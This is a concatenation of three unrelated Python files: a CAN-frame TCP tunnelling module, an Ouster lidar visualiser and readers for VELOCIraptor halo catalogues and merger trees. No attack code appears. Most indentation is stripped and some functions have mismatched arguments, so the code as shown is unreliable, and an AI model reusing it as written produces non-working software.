This module works as TCP client/server for tunneling CAN Frames
Init parameters example:
mode - 'client' or 'server'
    port - <int> - TCP port to listen on or to connect to (depends on mode)
address - 'ip.ip.ip.ip' - IP address of the server
Example: {'mode':'server','port':2001,'address':''}
Module parameters:
action - read or write. Will write/read to/from TCP
pipe - integer, 1 or 2 - from which pipe to read or write
    If you use both buses (and they are different), then you need only one pipe configured...
Example: {'action':'read','pipe':2}
"""
def get_status(self):
return "Current status: IN: " + str(len(self.server.CANList_in)) + str(self.server._access_in.is_set()) + " OUT: " + str(len(self.server.CANList_out)) + str(self.server._access_out.is_set())
def do_start_x(self):
if self.server is None:
self.dprint(2, 'Started mode as ' + str(self.mode))
self.set_error_text('Started mode as ' + str(self.mode))
if self.mode == 'server':
self.server = CustomTCPServer((self.HOST, self.PORT), ThreadedTCPRequestHandler)
self.server.prt = self.PORT
self._thread = threading.Thread(target=self.server.serve_forever)
self._thread.daemon = True
self._thread.start()
else:
self.server = CustomTCPClient((self.HOST, self.PORT))
self.server.selfx = self
def do_stop_x(self): # disable reading
if self.server is not None:
            self.dprint(2, 'Stopped mode as ' + str(self.mode))
            self.set_error_text('Stopped mode as ' + str(self.mode))
            if self.mode == 'server':
                self.server.shutdown()
                self.server.server_close()
                self._thread.join()
print("DONE")
else:
self.server.close()
self.server = None
def do_init(self, params): # Get device and open serial port
self.commands['t'] = Command("Send direct command to the device, like 13:8:1122334455667788", 1, " <cmd> ", self.dev_write, True)
self.mode = params.get('mode', None)
self.server = None
if not self.mode or self.mode not in ['server', 'client']:
self.dprint(0, 'Can\'t get mode!')
exit()
self.HOST = params.get('address', 'localhost')
self.PORT = int(params.get('port', 6550))
self._bus = "TCP_" + self.mode + "_" + str(self.PORT)
self.do_start_x()
return 1
def dev_write(self, line):
self.dprint(0, "CMD: " + line)
fid = line.split(":")[0]
length = line.split(":")[1]
data = line.split(":")[2]
self.server.write_can(CANMessage.init_data(int(fid), int(length), bytes.fromhex(data)[:int(length)]))
return "Sent!"
def do_effect(self, can_msg, args): # read full packet from serial port
if args.get('action') == 'read':
can_msg = self.do_read(can_msg)
elif args.get('action') == 'write':
self.do_write(can_msg)
else:
self.dprint(1, 'Command ' + args['action'] + ' not implemented 8(')
self.set_error_text('Command ' + args['action'] + ' not implemented 8(')
return can_msg
def do_write(self, can_msg):
if can_msg.CANData:
self.server.write_can(can_msg.CANFrame)
return can_msg
def do_read(self, can_msg):
if not can_msg.CANData:
can_frame = self.server.read_can()
if can_frame:
can_msg.CANData = True
can_msg.CANFrame = can_frame
can_msg.bus = self._bus
return can_msg
|
viz.py
|
import argparse
import os
import threading
import ouster.client as client
from ouster.sdk._viz import PyViz
def main() -> None:
descr = """Visualize pcap or sensor data using simple viz bindings."""
epilog = """When reading data from a sensor, this will currently not
configure the sensor or query it for the port to listen on. You will need to
set the sensor port and destination settings separately.
"""
parser = argparse.ArgumentParser(
description=descr, epilog=epilog)
required = parser.add_argument_group('one of the following is required')
group = required.add_mutually_exclusive_group(required=True)
group.add_argument('--sensor', metavar='HOST', help='sensor hostname')
group.add_argument('--pcap', metavar='PATH', help='path to pcap file')
parser.add_argument('--meta', metavar='PATH', help='path to metadata json')
parser.add_argument('--lidar-port', type=int, default=7502)
args = parser.parse_args()
if args.sensor:
print("Initializing...")
scans = client.Scans.stream(args.sensor,
args.lidar_port,
complete=False)
elif args.pcap:
import ouster.pcap as pcap
if args.meta:
metadata_path = args.meta
else:
print("Deducing metadata based on pcap name. "
"To provide a different metadata path, use --meta")
metadata_path = os.path.splitext(args.pcap)[0] + ".json"
with open(metadata_path) as json:
info = client.SensorInfo(json.read())
scans = client.Scans(
pcap.Pcap(args.pcap, info, rate=1.0, lidar_port=args.lidar_port))
viz = PyViz(scans.metadata)
def run() -> None:
try:
for scan in scans:
viz.draw(scan)
finally:
# signal main thread to exit
viz.quit()
try:
print("Starting client thread...")
client_thread = threading.Thread(target=run, name="Client")
client_thread.start()
print("Starting rendering loop...")
viz.loop()
finally:
scans.close()
client_thread.join()
print("Done")
if __name__ == "__main__":
main()
|
velociraptor_python_tools.py
|
#Make backwards compatible with python 2, ignored in python 3
from __future__ import print_function
import sys,os,os.path,string,time,re,struct
import math,operator
import numpy as np
import h5py #import hdf5 interface
import tables as pytb #import pytables
import pandas as pd
from copy import deepcopy
from collections import deque
import itertools
import scipy.interpolate as scipyinterp
import scipy.spatial as spatial
import multiprocessing as mp
from collections import deque
import cython
from cython.parallel import prange, parallel
#would be good to compile these routines with cython
#try to speed up search
#cimport numpy as np
"""
Routines for reading velociraptor output
"""
"""
IO Routines
"""
def ReadPropertyFile(basefilename,ibinary=0,iseparatesubfiles=0,iverbose=0, desiredfields=[], isiminfo=True, iunitinfo=True):
"""
VELOCIraptor/STF files in various formats
for example ascii format contains
a header with
filenumber number_of_files
numhalos_in_file nnumhalos_in_total
    followed by a header listing the information contained. An example would be
ID(1) ID_mbp(2) hostHaloID(3) numSubStruct(4) npart(5) Mvir(6) Xc(7) Yc(8) Zc(9) Xcmbp(10) Ycmbp(11) Zcmbp(12) VXc(13) VYc(14) VZc(15) VXcmbp(16) VYcmbp(17) VZcmbp(18) Mass_tot(19) Mass_FOF(20) Mass_200mean(21) Mass_200crit(22) Mass_BN97(23) Efrac(24) Rvir(25) R_size(26) R_200mean(27) R_200crit(28) R_BN97(29) R_HalfMass(30) Rmax(31) Vmax(32) sigV(33) veldisp_xx(34) veldisp_xy(35) veldisp_xz(36) veldisp_yx(37) veldisp_yy(38) veldisp_yz(39) veldisp_zx(40) veldisp_zy(41) veldisp_zz(42) lambda_B(43) Lx(44) Ly(45) Lz(46) q(47) s(48) eig_xx(49) eig_xy(50) eig_xz(51) eig_yx(52) eig_yy(53) eig_yz(54) eig_zx(55) eig_zy(56) eig_zz(57) cNFW(58) Krot(59) Ekin(60) Epot(61) n_gas(62) M_gas(63) Xc_gas(64) Yc_gas(65) Zc_gas(66) VXc_gas(67) VYc_gas(68) VZc_gas(69) Efrac_gas(70) R_HalfMass_gas(71) veldisp_xx_gas(72) veldisp_xy_gas(73) veldisp_xz_gas(74) veldisp_yx_gas(75) veldisp_yy_gas(76) veldisp_yz_gas(77) veldisp_zx_gas(78) veldisp_zy_gas(79) veldisp_zz_gas(80) Lx_gas(81) Ly_gas(82) Lz_gas(83) q_gas(84) s_gas(85) eig_xx_gas(86) eig_xy_gas(87) eig_xz_gas(88) eig_yx_gas(89) eig_yy_gas(90) eig_yz_gas(91) eig_zx_gas(92) eig_zy_gas(93) eig_zz_gas(94) Krot_gas(95) T_gas(96) Zmet_gas(97) SFR_gas(98) n_star(99) M_star(100) Xc_star(101) Yc_star(102) Zc_star(103) VXc_star(104) VYc_star(105) VZc_star(106) Efrac_star(107) R_HalfMass_star(108) veldisp_xx_star(109) veldisp_xy_star(110) veldisp_xz_star(111) veldisp_yx_star(112) veldisp_yy_star(113) veldisp_yz_star(114) veldisp_zx_star(115) veldisp_zy_star(116) veldisp_zz_star(117) Lx_star(118) Ly_star(119) Lz_star(120) q_star(121) s_star(122) eig_xx_star(123) eig_xy_star(124) eig_xz_star(125) eig_yx_star(126) eig_yy_star(127) eig_yz_star(128) eig_zx_star(129) eig_zy_star(130) eig_zz_star(131) Krot_star(132) tage_star(133) Zmet_star(134)
then followed by data
Note that a file will indicate how many files the total output has been split into
    Not all fields need to be read in. If you only want specific fields, you can pass a list of desired field names like
['ID', 'Mass_FOF', 'Krot']
#todo still need checks to see if fields not present and if so, not to include them or handle the error
"""
    #this variable is the size of the char array in binary formatted data that stores the field names
CHARSIZE=40
start = time.clock()
inompi=True
if (iverbose): print("reading properties file",basefilename)
filename=basefilename+".properties"
#load header
if (os.path.isfile(filename)==True):
numfiles=0
else:
filename=basefilename+".properties"+".0"
inompi=False
if (os.path.isfile(filename)==False):
print("file not found")
return []
byteoffset=0
#used to store fields, their type, etc
fieldnames=[]
fieldtype=[]
fieldindex=[]
if (ibinary==0):
#load ascii file
halofile = open(filename, 'r')
#read header information
[filenum,numfiles]=halofile.readline().split()
filenum=int(filenum);numfiles=int(numfiles)
[numhalos, numtothalos]= halofile.readline().split()
numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
names = ((halofile.readline())).split()
#remove the brackets in ascii file names
fieldnames= [fieldname.split("(")[0] for fieldname in names]
for i in np.arange(fieldnames.__len__()):
fieldname=fieldnames[i]
if fieldname in ["ID","numSubStruct","npart","n_gas","n_star", "Structuretype"]:
fieldtype.append(np.uint64)
elif fieldname in ["ID_mbp", "hostHaloID"]:
fieldtype.append(np.int64)
else:
fieldtype.append(np.float64)
halofile.close()
#if desiredfields is NULL load all fields
#but if this is passed load only those fields
if (len(desiredfields)>0):
lend=len(desiredfields)
fieldindex=np.zeros(lend,dtype=int)
desiredfieldtype=[[] for i in range(lend)]
for i in range(lend):
fieldindex[i]=fieldnames.index(desiredfields[i])
desiredfieldtype[i]=fieldtype[fieldindex[i]]
fieldtype=desiredfieldtype
fieldnames=desiredfields
#to store the string containing data format
fieldtypestring=''
for i in np.arange(fieldnames.__len__()):
if fieldtype[i]==np.uint64: fieldtypestring+='u8,'
elif fieldtype[i]==np.int64: fieldtypestring+='i8,'
elif fieldtype[i]==np.float64: fieldtypestring+='f8,'
elif (ibinary==1):
#load binary file
halofile = open(filename, 'rb')
[filenum,numfiles]=np.fromfile(halofile,dtype=np.int32,count=2)
[numhalos,numtothalos]=np.fromfile(halofile,dtype=np.uint64,count=2)
headersize=np.fromfile(halofile,dtype=np.int32,count=1)[0]
byteoffset=np.dtype(np.int32).itemsize*3+np.dtype(np.uint64).itemsize*2+4*headersize
for i in range(headersize):
            fieldnames.append(halofile.read(CHARSIZE).decode('ascii', 'ignore').rstrip('\x00').strip())
for i in np.arange(fieldnames.__len__()):
fieldname=fieldnames[i]
if fieldname in ["ID","numSubStruct","npart","n_gas","n_star", "Structuretype"]:
fieldtype.append(np.uint64)
elif fieldname in ["ID_mbp", "hostHaloID"]:
fieldtype.append(np.int64)
else:
fieldtype.append(np.float64)
halofile.close()
#if desiredfields is NULL load all fields
#but if this is passed load only those fields
if (len(desiredfields)>0):
lend=len(desiredfields)
fieldindex=np.zeros(lend,dtype=int)
desiredfieldtype=[[] for i in range(lend)]
for i in range(lend):
fieldindex[i]=fieldnames.index(desiredfields[i])
desiredfieldtype[i]=fieldtype[fieldindex[i]]
fieldtype=desiredfieldtype
fieldnames=desiredfields
#to store the string containing data format
fieldtypestring=''
for i in np.arange(fieldnames.__len__()):
if fieldtype[i]==np.uint64: fieldtypestring+='u8,'
elif fieldtype[i]==np.int64: fieldtypestring+='i8,'
elif fieldtype[i]==np.float64: fieldtypestring+='f8,'
elif (ibinary==2):
#load hdf file
halofile = h5py.File(filename, 'r')
filenum=int(halofile["File_id"][0])
numfiles=int(halofile["Num_of_files"][0])
numhalos=np.uint64(halofile["Num_of_groups"][0])
numtothalos=np.uint64(halofile["Total_num_of_groups"][0])
#atime=np.float(halofile.attrs["Time"])
fieldnames=[str(n) for n in halofile.keys()]
#clean of header info
fieldnames.remove("File_id")
fieldnames.remove("Num_of_files")
fieldnames.remove("Num_of_groups")
fieldnames.remove("Total_num_of_groups")
fieldtype=[halofile[fieldname].dtype for fieldname in fieldnames]
        #if the desiredfields argument is passed, only these fields are loaded
if (len(desiredfields)>0):
if (iverbose):print("Loading subset of all fields in property file ", len(desiredfields), " instead of ", len(fieldnames))
fieldnames=desiredfields
fieldtype=[halofile[fieldname].dtype for fieldname in fieldnames]
halofile.close()
#allocate memory that will store the halo dictionary
catalog={fieldnames[i]:np.zeros(numtothalos,dtype=fieldtype[i]) for i in range(len(fieldnames))}
noffset=np.uint64(0)
for ifile in range(numfiles):
if (inompi==True): filename=basefilename+".properties"
else: filename=basefilename+".properties"+"."+str(ifile)
if (iverbose) : print("reading ",filename)
if (ibinary==0):
halofile = open(filename, 'r')
halofile.readline()
numhalos=np.uint64(halofile.readline().split()[0])
halofile.close()
if (numhalos>0):htemp = np.loadtxt(filename,skiprows=3, usecols=fieldindex, dtype=fieldtypestring, unpack=True, ndmin=1)
elif(ibinary==1):
halofile = open(filename, 'rb')
np.fromfile(halofile,dtype=np.int32,count=2)
numhalos=np.fromfile(halofile,dtype=np.uint64,count=2)[0]
#halofile.seek(byteoffset);
if (numhalos>0):htemp=np.fromfile(halofile, usecols=fieldindex, dtype=fieldtypestring, unpack=True)
halofile.close()
elif(ibinary==2):
#here convert the hdf information into a numpy array
halofile = h5py.File(filename, 'r')
numhalos=np.uint64(halofile["Num_of_groups"][0])
if (numhalos>0):htemp=[np.array(halofile[catvalue]) for catvalue in fieldnames]
halofile.close()
#numhalos=len(htemp[0])
for i in range(len(fieldnames)):
catvalue=fieldnames[i]
if (numhalos>0): catalog[catvalue][noffset:noffset+numhalos]=htemp[i]
noffset+=numhalos
#if subhalos are written in separate files, then read them too
if (iseparatesubfiles==1):
for ifile in range(numfiles):
if (inompi==True): filename=basefilename+".sublevels"+".properties"
else: filename=basefilename+".sublevels"+".properties"+"."+str(ifile)
if (iverbose) : print("reading ",filename)
if (ibinary==0):
halofile = open(filename, 'r')
halofile.readline()
numhalos=np.uint64(halofile.readline().split()[0])
halofile.close()
if (numhalos>0):htemp = np.loadtxt(filename,skiprows=3, usecols=fieldindex, dtype=fieldtypestring, unpack=True, ndmin=1)
elif(ibinary==1):
halofile = open(filename, 'rb')
#halofile.seek(byteoffset);
np.fromfile(halofile,dtype=np.int32,count=2)
numhalos=np.fromfile(halofile,dtype=np.uint64,count=2)[0]
if (numhalos>0):htemp=np.fromfile(halofile, usecols=fieldindex, dtype=fieldtypestring, unpack=True)
halofile.close()
elif(ibinary==2):
halofile = h5py.File(filename, 'r')
numhalos=np.uint64(halofile["Num_of_groups"][0])
if (numhalos>0):htemp=[np.array(halofile[catvalue]) for catvalue in fieldnames]
halofile.close()
#numhalos=len(htemp[0])
for i in range(len(fieldnames)):
catvalue=fieldnames[i]
if (numhalos>0): catalog[catvalue][noffset:noffset+numhalos]=htemp[i]
noffset+=numhalos
#load associated simulation info, time and units
if (isiminfo):
siminfoname=basefilename+".siminfo"
siminfo=open(siminfoname,'r')
catalog['SimulationInfo']=dict()
for l in siminfo:
d=l.strip().split(' : ')
catalog['SimulationInfo'][d[0]]=float(d[1])
siminfo.close()
if (iunitinfo):
unitinfoname=basefilename+".units"
unitinfo=open(unitinfoname,'r')
catalog['UnitInfo']=dict()
for l in unitinfo:
d=l.strip().split(' : ')
catalog['UnitInfo'][d[0]]=float(d[1])
unitinfo.close()
if (iverbose): print("done reading properties file ",time.clock()-start)
return catalog,numtothalos
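# Example call (illustrative only; the base filename is hypothetical):
#     catalog, numtot = ReadPropertyFile("snap_050.VELOCIraptor", ibinary=2,
#                                        desiredfields=['ID', 'Mass_FOF', 'Krot'])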
def ReadPropertyFileMultiWrapper(basefilename,index,halodata,numhalos,atime,ibinary=0,iseparatesubfiles=0,iverbose=0,desiredfields=[]):
"""
Wrapper for multithreaded reading
"""
#call read routine and store the data
halodata[index],numhalos[index]=ReadPropertyFile(basefilename,ibinary,iseparatesubfiles,iverbose,desiredfields)
def ReadPropertyFileMultiWrapperNamespace(index,basefilename,ns,ibinary=0,iseparatesubfiles=0,iverbose=0,desiredfields=[]):
#call read routine and store the data
ns.hdata[index],ns.ndata[index]=ReadPropertyFile(basefilename,ibinary,iseparatesubfiles,iverbose,desiredfields)
def ReadHaloMergerTree(treefilename,ibinary=0,iverbose=0,imerit=False,inpart=False):
"""
VELOCIraptor/STF merger tree in ascii format contains
a header with
number_of_snapshots
a description of how the tree was built
total number of halos across all snapshots
then followed by data
for each snapshot
snapshotvalue numhalos
haloid_1 numprogen_1
progenid_1
progenid_2
...
progenid_numprogen_1
haloid_2 numprogen_2
.
.
.
one can also have an output format that has an additional field for each progenitor, the meritvalue
"""
start = time.clock()
tree=[]
if (iverbose): print("reading Tree file",treefilename,os.path.isfile(treefilename))
if (os.path.isfile(treefilename)==False):
print("Error, file not found")
return tree
#if ascii format
if (ibinary==0):
treefile = open(treefilename, 'r')
numsnap=int(treefile.readline())
treefile.close()
elif(ibinary==2):
snaptreelist=open(treefilename,'r')
numsnap = sum(1 for line in snaptreelist)
snaptreelist.close()
else:
print("Unknown format, returning null")
numsnap=0
return tree
tree=[{"haloID": [], "Num_progen": [], "Progen": []} for i in range(numsnap)]
if (imerit):
for i in range(numsnap):
tree[i]['Merit']=[]
if (inpart):
for i in range(numsnap):
tree[i]['Npart']=[]
tree[i]['Npart_progen']=[]
#if ascii format
if (ibinary==0):
treefile = open(treefilename, 'r')
numsnap=int(treefile.readline())
descrip=treefile.readline().strip()
tothalos=int(treefile.readline())
offset=0
totalnumprogen=0
for i in range(numsnap):
[snapval,numhalos]=treefile.readline().strip().split('\t')
snapval=int(snapval);numhalos=int(numhalos)
#if really verbose
if (iverbose==2): print(snapval,numhalos)
tree[i]["haloID"]=np.zeros(numhalos, dtype=np.int64)
tree[i]["Num_progen"]=np.zeros(numhalos, dtype=np.uint32)
tree[i]["Progen"]=[[] for j in range(numhalos)]
if (imerit): tree[i]["Merit"]=[[] for j in range(numhalos)]
if (inpart):
tree[i]["Npart"]=np.zeros(numhalos, dtype=np.uint32)
tree[i]["Npart_progen"]=[[] for j in range(numhalos)]
for j in range(numhalos):
data=treefile.readline().strip().split('\t')
hid=np.int64(data[0]);nprog=np.uint32(data[1])
tree[i]["haloID"][j]=hid
tree[i]["Num_progen"][j]=nprog
if (inpart):tree[i]["Npart"][j]=np.uint32(data[2])
totalnumprogen+=nprog
if (nprog>0):
tree[i]["Progen"][j]=np.zeros(nprog,dtype=np.int64)
if (imerit): tree[i]["Merit"][j]=np.zeros(nprog,dtype=np.float32)
if (inpart): tree[i]["Npart_progen"][j]=np.zeros(nprog,dtype=np.uint32)
for k in range(nprog):
data=treefile.readline().strip().split(' ')
tree[i]["Progen"][j][k]=np.int64(data[0])
if (imerit):tree[i]["Merit"][j][k]=np.float32(data[1])
if (inpart):tree[i]["Npart_progen"][j][k]=np.uint32(data[2])
elif(ibinary==2):
snaptreelist=open(treefilename,'r')
#read the first file, get number of snaps from hdf file
snaptreename = snaptreelist.readline().strip()+".tree"
treedata=h5py.File(snaptreename,"r")
numsnaps=treedata.attrs['Number_of_snapshots']
treedata.close()
snaptreelist.close()
snaptreelist=open(treefilename,'r')
for snap in range(numsnaps):
snaptreename = snaptreelist.readline().strip()+".tree"
if (iverbose): print("Reading",snaptreename)
treedata = h5py.File(snaptreename,"r")
tree[snap]["haloID"] = np.asarray(treedata["ID"])
tree[snap]["Num_progen"] = np.asarray(treedata["NumProgen"])
if(inpart):tree[snap]["Npart"] = np.asarray(treedata["Npart"])
            #See if the dataset exists
if("ProgenOffsets" in treedata.keys()):
#Find the indices to split the array
split = np.add(np.asarray(treedata["ProgenOffsets"]),tree[snap]["Num_progen"],dtype=np.uint64,casting="unsafe")
#Read in the progenitors, splitting them as reading them in
tree[snap]["Progen"] = np.split(treedata["Progenitors"][:],split[:-1])
if(inpart): tree[snap]["Npart_progen"] = np.split(treedata["ProgenNpart"],split[:-1])
if(imerit): tree[snap]["Merit"] = np.split(treedata["Merits"],split[:-1])
snaptreelist.close()
if (iverbose): print("done reading tree file ",time.clock()-start)
return tree
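# Example call (illustrative; the tree file name is hypothetical):
#     tree = ReadHaloMergerTree("treefile", ibinary=0, imerit=True)
#     # progenitor IDs of the first halo in the first snapshot block:
#     progenitors = tree[0]["Progen"][0]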
def ReadHaloMergerTreeDescendant(treefilename,ireverseorder=True,ibinary=0,iverbose=0,imerit=False,inpart=False):
"""
VELOCIraptor/STF descendant based merger tree in ascii format contains
a header with
number_of_snapshots
a description of how the tree was built
total number of halos across all snapshots
then followed by data
for each snapshot
snapshotvalue numhalos
haloid_1 numprogen_1
progenid_1
progenid_2
...
progenid_numprogen_1
haloid_2 numprogen_2
.
.
.
one can also have an output format that has an additional field for each progenitor, the meritvalue
"""
start = time.clock()
tree=[]
if (iverbose): print("reading Tree file",treefilename,os.path.isfile(treefilename))
if (os.path.isfile(treefilename)==False):
print("Error, file not found")
return tree
    #find out how many snapshots there are
#if ascii format
if (ibinary==0):
if (iverbose): print("Reading ascii input")
treefile = open(treefilename, 'r')
numsnap=int(treefile.readline())
treefile.close()
#hdf format, input file is a list of filenames
elif(ibinary==2):
if (iverbose): print("Reading HDF5 input")
snaptreelist=open(treefilename,'r')
numsnap = sum(1 for line in snaptreelist)
snaptreelist.close()
else:
print("Unknown format, returning null")
numsnap=0
return tree
tree=[{"haloID": [], "Num_descen": [], "Descen": [], "Rank": []} for i in range(numsnap)]
if (imerit):
for i in range(numsnap):
tree[i]['Merit']=[]
if (inpart):
for i in range(numsnap):
tree[i]['Npart']=[]
tree[i]['Npart_descen']=[]
if (ibinary==0):
treefile = open(treefilename, 'r')
numsnap=int(treefile.readline())
descrip=treefile.readline().strip()
tothalos=int(treefile.readline())
offset=0
totalnumdescen=0
for i in range(numsnap):
ii=i
if (ireverseorder): ii=numsnap-1-i
[snapval,numhalos]=treefile.readline().strip().split('\t')
snapval=int(snapval);numhalos=int(numhalos)
#if really verbose
if (iverbose==2): print(snapval,numhalos)
tree[ii]["haloID"]=np.zeros(numhalos, dtype=np.int64)
tree[ii]["Num_descen"]=np.zeros(numhalos, dtype=np.uint32)
tree[ii]["Descen"]=[[] for j in range(numhalos)]
tree[ii]["Rank"]=[[] for j in range(numhalos)]
if (imerit): tree[ii]["Merit"]=[[] for j in range(numhalos)]
if (inpart):
tree[i]["Npart"]=np.zeros(numhalos, dtype=np.uint32)
tree[ii]["Npart_descen"]=[[] for j in range(numhalos)]
for j in range(numhalos):
data=treefile.readline().strip().split('\t')
hid=np.int64(data[0]);ndescen=np.uint32(data[1])
tree[ii]["haloID"][j]=hid
tree[ii]["Num_descen"][j]=ndescen
if (inpart):tree[ii]["Npart"][j]=np.uint32(data[2])
totalnumdescen+=ndescen
if (ndescen>0):
tree[ii]["Descen"][j]=np.zeros(ndescen,dtype=np.int64)
tree[ii]["Rank"][j]=np.zeros(ndescen,dtype=np.uint32)
if (imerit): tree[ii]["Merit"][j]=np.zeros(ndescen,dtype=np.float32)
if (inpart): tree[ii]["Npart_descen"][j]=np.zeros(ndescen,dtype=np.float32)
for k in range(ndescen):
data=treefile.readline().strip().split(' ')
tree[ii]["Descen"][j][k]=np.int64(data[0])
tree[ii]["Rank"][j][k]=np.uint32(data[1])
if (imerit): tree[ii]["Merit"][j][k]=np.float32(data[2])
if (inpart): tree[ii]["Npart_descen"][j][k]=np.uint32(data[3])
#hdf format
elif(ibinary==2):
snaptreelist=open(treefilename,'r')
#read the first file, get number of snaps from hdf file
snaptreename = snaptreelist.readline().strip()+".tree"
treedata=h5py.File(snaptreename,"r")
numsnaps=treedata.attrs['Number_of_snapshots']
treedata.close()
snaptreelist.close()
snaptreelist=open(treefilename,'r')
for snap in range(numsnap):
snaptreename = snaptreelist.readline().strip()+".tree"
if (iverbose): print("Reading",snaptreename)
treedata = h5py.File(snaptreename,"r")
tree[snap]["haloID"] = np.array(treedata["ID"])
tree[snap]["Num_descen"] = np.array(treedata["NumDesc"])
if(inpart):tree[snap]["Npart"] = np.asarray(treedata["Npart"])
            #See if the dataset exists
if("DescOffsets" in treedata.keys()):
#Find the indices to split the array
split = np.add(np.array(treedata["DescOffsets"]), tree[snap]["Num_descen"],dtype=np.uint64,casting="unsafe")
# Read in the data splitting it up as reading it in
tree[snap]["Rank"] = np.split(treedata["Ranks"][:],split[:-1])
tree[snap]["Descen"] = np.split(treedata["Descendants"][:],split[:-1])
if(inpart): tree[snap]["Npart_progen"] = np.split(treedata["ProgenNpart"][:],split[:-1])
if(imerit): tree[snap]["Merit"] = np.split(treedata["Merits"][:],split[:-1])
snaptreelist.close()
if (iverbose): print("done reading tree file ",time.clock()-start)
return tree
def ReadHaloPropertiesAcrossSnapshots(numsnaps,snaplistfname,inputtype,iseperatefiles,iverbose=0,desiredfields=[]):
"""
read halo data from snapshots listed in file with snaplistfname file name
"""
halodata=[dict() for j in range(numsnaps)]
ngtot=[0 for j in range(numsnaps)]
atime=[0 for j in range(numsnaps)]
start=time.clock()
print("reading data")
#if there are a large number of snapshots to read, read in parallel
#only read in parallel if worthwhile, specifically if large number of snapshots and snapshots are ascii
iparallel=(numsnaps>20 and inputtype==2)
if (iparallel):
#determine maximum number of threads
nthreads=min(mp.cpu_count(),numsnaps)
nchunks=int(np.ceil(numsnaps/float(nthreads)))
print("Using", nthreads,"threads to parse ",numsnaps," snapshots in ",nchunks,"chunks")
#load file names
snapnamelist=open(snaplistfname,'r')
catfilename=["" for j in range(numsnaps)]
for j in range(numsnaps):
catfilename[j]=snapnamelist.readline().strip()
#allocate a manager
manager = mp.Manager()
#use manager to specify the dictionary and list that can be accessed by threads
hdata=manager.list([manager.dict() for j in range(numsnaps)])
ndata=manager.list([0 for j in range(numsnaps)])
adata=manager.list([0 for j in range(numsnaps)])
        #now for each chunk run a set of processes
for j in range(nchunks):
offset=j*nthreads
#if last chunk then must adjust nthreads
if (j==nchunks-1):
nthreads=numsnaps-offset
#when calling a process pass manager based proxies, which then are used to copy data back
processes=[mp.Process(target=ReadPropertyFileMultiWrapper,args=(catfilename[offset+k],k+offset,hdata,ndata,adata,inputtype,iseperatefiles,iverbose,desiredfields)) for k in range(nthreads)]
#start each process
#store the state of each thread, alive or not, and whether it has finished
activethreads=[[True,False] for k in range(nthreads)]
count=0
for p in processes:
print("reading", catfilename[offset+count])
p.start()
            #space threads apart (join's timeout is 0.2 seconds)
p.join(0.2)
count+=1
totactivethreads=nthreads
while(totactivethreads>0):
count=0
for p in processes:
#join thread and see if still active
p.join(0.5)
if (p.is_alive()==False):
                    #if thread is no longer active, check whether it has been processed
if (activethreads[count][1]==False):
#make deep copy of manager constructed objects that store data
#halodata[i][offset+count]=deepcopy(hdata[offset+count])
#try instead init a dictionary
halodata[offset+count]=dict(hdata[offset+count])
ngtot[offset+count]=ndata[offset+count]
atime[offset+count]=adata[offset+count]
#effectively free the data in manager dictionary
hdata[offset+count]=[]
activethreads[count][0]=False
activethreads[count][1]=True
totactivethreads-=1
count+=1
#terminate threads
for p in processes:
p.terminate()
else:
snapnamelist=open(snaplistfname,'r')
for j in range(0,numsnaps):
catfilename=snapnamelist.readline().strip()
print("reading ", catfilename)
halodata[j],ngtot[j],atime[j] = ReadPropertyFile(catfilename,inputtype,iseperatefiles,iverbose,desiredfields)
print("data read in ",time.clock()-start)
return halodata,ngtot,atime
def ReadCrossCatalogList(fname,meritlim=0.1,iverbose=0):
"""
Reads a cross catalog produced by halomergertree,
also allows trimming of cross catalog using a higher merit threshold than one used to produce catalog
"""
start = time.clock()
if (iverbose): print("reading cross catalog")
dfile=open(fname,"r")
dfile.readline()
dfile.readline()
dataline=(dfile.readline().strip()).split('\t')
ndata=np.int32(dataline[1])
pdata=CrossCatalogList(ndata)
for i in range(0,ndata):
data=(dfile.readline().strip()).split('\t')
nmatches=np.int32(data[1])
for j in range(0,nmatches):
data=(dfile.readline().strip()).split(' ')
meritval=np.float32(data[1])
nsharedval=np.float32(data[2])
if(meritval>meritlim):
nmatchid=np.int64(data[0])
pdata.matches[i].append(nmatchid)
pdata.matches[i].append(meritval)
pdata.nsharedfrac[i].append(nsharedval)
pdata.nmatches[i]+=1
dfile.close()
if (iverbose): print("done reading cross catalog ",time.clock()-start)
return pdata
def ReadSimInfo(basefilename):
"""
Reads in the information in .siminfo and returns it as a dictionary
"""
filename = basefilename + ".siminfo"
if (os.path.isfile(filename)==False):
print("file not found")
return []
cosmodata = {}
siminfofile = open(filename,"r")
line = siminfofile.readline().strip().split(" : ")
while(line[0]!=""):
cosmodata[line[0]] = float(line[1])
line = siminfofile.readline().strip().split(" : ")
siminfofile.close()
return cosmodata
def ReadUnitInfo(basefilename):
"""
Reads in the information in .units and returns it as a dictionary
"""
filename = basefilename + ".units"
if (os.path.isfile(filename)==False):
print("file not found")
return []
unitdata = {}
unitsfile = open(filename,"r")
line = unitsfile.readline().strip().split(" : ")
while(line[0]!=""):
unitdata[line[0]] = float(line[1])
line = unitsfile.readline().strip().split(" : ")
unitsfile.close()
return unitdata
def ReadParticleDataFile(basefilename,ibinary=0,iseparatesubfiles=0,iparttypes=0,iverbose=0, binarydtype=np.int64):
"""
VELOCIraptor/STF catalog_group, catalog_particles and catalog_parttypes in various formats
Note that a file will indicate how many files the total output has been split into
"""
inompi=True
if (iverbose): print("reading particle data",basefilename)
gfilename=basefilename+".catalog_groups"
pfilename=basefilename+".catalog_particles"
upfilename=pfilename+".unbound"
tfilename=basefilename+".catalog_parttypes"
utfilename=tfilename+".unbound"
#check for file existence
if (os.path.isfile(gfilename)==True):
numfiles=0
else:
gfilename+=".0"
pfilename+=".0"
upfilename+=".0"
tfilename+=".0"
utfilename+=".0"
inompi=False
if (os.path.isfile(gfilename)==False):
print("file not found")
return []
byteoffset=0
#load header information from file to get total number of groups
#ascii
if (ibinary==0):
gfile = open(gfilename, 'r')
[filenum,numfiles]=gfile.readline().split()
filenum=int(filenum);numfiles=int(numfiles)
[numhalos, numtothalos]= gfile.readline().split()
numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
#binary
elif (ibinary==1):
gfile = open(gfilename, 'rb')
[filenum,numfiles]=np.fromfile(gfile,dtype=np.int32,count=2)
[numhalos,numtothalos]=np.fromfile(gfile,dtype=np.uint64,count=2)
#hdf
elif (ibinary==2):
gfile = h5py.File(gfilename, 'r')
filenum=int(gfile["File_id"][0])
numfiles=int(gfile["Num_of_files"][0])
numhalos=np.uint64(gfile["Num_of_groups"][0])
numtothalos=np.uint64(gfile["Total_num_of_groups"][0])
gfile.close()
particledata=dict()
particledata['Npart']=np.zeros(numtothalos,dtype=np.uint64)
